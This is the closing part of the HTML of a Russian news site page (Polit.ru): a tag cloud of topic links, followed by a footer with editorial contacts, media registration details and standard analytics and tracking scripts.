  <a href="/tag/suicid/" class="weight7">суицид</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/usa/" class="weight12 force-hi">США</a>
  

  

  

  

  

  
  <a href="/tag/tadzhikistan/" class="weight3">Таджикистан</a>
  

  
  <a href="/tag/tailand/" class="weight7">Таиланд</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/tatarstan/" class="weight6">Татарстан</a>
  

  

  

  

  

  
  <a href="/tag/theatre/" class="weight6">театр</a>
  

  

  

  
  <a href="/tag/TV/" class="weight9">телевидение</a>
  

  

  

  

  

  

  

  
  <a href="/tag/terakt/" class="weight10">теракт</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/terrorizm/" class="weight11 force-hi">терроризм</a>
  

  

  
  <a href="/tag/technology/" class="weight0 macrotag">технологии</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/transportation/" class="weight9">транспорт</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/turizm/" class="weight9">туризм</a>
  

  

  

  
  <a href="/tag/turciya/" class="weight10 force-hi">Турция</a>
  

  

  
  <a href="/tag/dungeons_and_dragons/" class="weight8">тюрьмы и колонии</a>
  

  
  <a href="/tag/murder/" class="weight11 force-hi">убийство</a>
  

  

  

  

  

  

  
  <a href="/tag/uefa/" class="weight6">УЕФА</a>
  

  

  

  

  

  
  <a href="/tag/ukraine/" class="weight13 force-hi">Украина</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/fas/" class="weight6">ФАС</a>
  

  

  

  

  

  
  <a href="/tag/federalnaya-migracionnaya-sluzhba/" class="weight7">Федеральная миграционная служба</a>
  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/physics/" class="weight7">физика</a>
  

  

  

  

  

  

  

  
  <a href="/tag/finland/" class="weight6">Финляндия</a>
  

  
  <a href="/tag/fifa/" class="weight8">ФИФА</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/fondovaya-birzha/" class="weight9">фондовая биржа</a>
  

  

  

  

  

  

  
  <a href="/tag/photorep/" class="weight7">Фоторепортаж</a>
  

  
  <a href="/tag/francois_hollande/" class="weight7">Франсуа Олланд</a>
  

  

  
  <a href="/tag/france/" class="weight10 force-hi">Франция</a>
  

  

  
  <a href="/tag/fsb/" class="weight9">ФСБ</a>
  

  
  <a href="/tag/fsin/" class="weight7">ФСИН</a>
  

  
  <a href="/tag/fskn/" class="weight6">ФСКН</a>
  

  

  

  

  

  

  
  <a href="/tag/soccer/" class="weight11 force-hi">футбол</a>
  

  

  

  
  <a href="/tag/habarovskij-kraj/" class="weight7">Хабаровский край</a>
  

  

  

  

  
  <a href="/tag/hakery/" class="weight8">хакеры</a>
  

  

  

  

  
  <a href="/tag/harkov/" class="weight6">Харьков</a>
  

  

  

  

  

  

  
  <a href="/tag/hillari-klinton/" class="weight5">Хиллари Клинтон</a>
  

  
  <a href="/tag/chemical_weapon/" class="weight7">химическое оружие</a>
  

  

  

  

  

  

  

  
  <a href="/tag/hokkej/" class="weight8">хоккей</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/huliganstvo/" class="weight4">хулиганство</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/centrobank/" class="weight10">Центробанк</a>
  

  

  

  

  
  <a href="/tag/cik/" class="weight6">ЦИК</a>
  

  
  <a href="/tag/vzr/" class="weight0 force-hi macrotag">Цикл бесед &quot;Взрослые люди&quot;</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/cska/" class="weight5">ЦСКА</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/chelyabinskaya-oblast/" class="weight7">Челябинская область</a>
  

  

  

  

  

  

  

  
  <a href="/tag/chechnya/" class="weight10 force-hi">Чечня</a>
  

  

  

  

  

  
  <a href="/tag/world_cup_2018/" class="weight5">ЧМ-2018</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/shahty/" class="weight6">шахты</a>
  

  
  <a href="/tag/switzerland/" class="weight7">Швейцария</a>
  

  
  <a href="/tag/sweden/" class="weight6">Швеция</a>
  

  

  

  
  <a href="/tag/schcool/" class="weight8">школа</a>
  

  

  

  

  

  
  <a href="/tag/shpionazh/" class="weight8">шпионаж</a>
  

  

  

  

  

  
  <a href="/tag/ebola/" class="weight8">Эбола</a>
  

  

  

  

  

  
  <a href="/tag/edvard-snouden/" class="weight8">Эдвард Сноуден</a>
  

  

  

  

  
  <a href="/tag/ecology/" class="weight9">экология</a>
  

  
  <a href="/tag/economy/" class="weight10">экономика</a>
  

  

  
  <a href="/tag/ekonomicheskij-krizis/" class="weight9">экономический кризис</a>
  

  

  

  

  

  
  <a href="/tag/extremismus/" class="weight8">экстремизм</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/estoniya/" class="weight6">Эстония</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/south_korea/" class="weight8">Южная Корея</a>
  

  

  

  

  

  
  <a href="/tag/yukos/" class="weight10">ЮКОС</a>
  

  
  <a href="/tag/yuliya-timoshenko/" class="weight6">Юлия Тимошенко</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/nuclear_weapon/" class="weight8">ядерное оружие</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/japan/" class="weight9">Япония</a>
  

  

  

  

  

</div>



  
</div>

      
    
  
  </div>




    <!--BEGIN #footer-->

    <!--BEGIN #footer-->
    <div style="margin: 15px 0 25px;">
      <!--LiveInternet counter--><script type="text/JavaScript"><!--
        document.write('<a href="http://www.liveinternet.ru/click" target=liveinternet rel="nofollow"><img src="//counter.yadro.ru/hit?t45.6;r'+
          escape(document.referrer)+((typeof(screen)=='undefined')?'':';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
          screen.colorDepth:screen.pixelDepth))+';'+Math.random()+'" border=0 width=31 height=31 alt="liveinternet.ru"></a>')
      //--></script><!--/LiveInternet-->
    </div>
    <div class="info-container stop">
      <div class="first">
        <h4 class="subject block-subject"><a href="/rubric/redakciya/" rel="nofollow" style="color:#FFF;">Редакция</a></h4>
        Электронная почта: <a href="mailto:politru.edit1@gmail.com" rel="nofollow">politru.edit1@gmail.com</a>
        <br/>
        Адрес: 129343, Москва, проезд Серебрякова, д.2, корп.1, 9 этаж.
        <br/>
        Телефоны: +7 495 980 1893, +7 495 980 1894.
        <br/>
        <a href="/static/price.xlsx">Стоимость услуг Полит.ру</a>
                    <!-- Yandex.Metrika counter -->
                    <div style="display:none;"><script type="text/javascript">
                    (function(w, c) {
                        (w[c] = w[c] || []).push(function() {
                            try {
                                w.yaCounter5421865 = new Ya.Metrika(5421865);
                                 yaCounter5421865.clickmap(true);
                                 yaCounter5421865.trackLinks(true);

                            } catch(e) { }
                        });
                    })(window, 'yandex_metrika_callbacks');
                    </script></div>
                    <script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"
                    defer="defer"></script>
                    <noscript><div><img src="//mc.yandex.ru/watch/5421865"
                    style="position:absolute; left:-9999px;" alt="" /></div></noscript>
                    <!-- /Yandex.Metrika counter -->
      </div>
      <div class="agelimit"></div>
      <div class="second">
        Свидетельство о регистрации средства массовой информации<br/>
        Эл. № 77-8425 от 1 декабря 2003г. Выдано министерством<br/>
        Российской Федерации по делам печати, телерадиовещания и<br/>
        средств массовой информации.
        Выходит с 21 февраля 1998 года.<br/>
        При любом использовании материалов веб-сайта ссылка на Полит.ру обязательна.<br/>
        При перепечатке в Интернете обязательна гиперссылка <a href="/">polit.ru</a>.<br/>
        Все права защищены и охраняются законом.<br/>
        © Полит.ру, 1998–2014<a rel="nofollow" href="/purge/news/2016/09/14/shreder_divorce/" style="text-decoration: none; color: #FFFFFF;">.</a>
      </div>
    </div>
    <div class="black-bottom stop">

    </div>
  </div>


	


    <!--END #footer-->
  <script type="text/javascript">
    (window.Image ? (new Image()) : document.createElement('img')).src = location.protocol + '//vk.com/rtrg?r=DWczk9hWeAvkw4Spq8D4hz2w1MfxfpmDx/ZgQHRFD0o641mnFqVMc*QV8joivbZSsPA/URYGFFIRCucM8ibEezf2AYNfSVMgaMW2N1cgx/flht*xh7XqKekOJqgAXuZvzaemjUVvGkCuk5jEUkCi*4*H82g4/Y64rYb2Itn*pT0-';
    load_banners();
  </script>
</body>
</html>

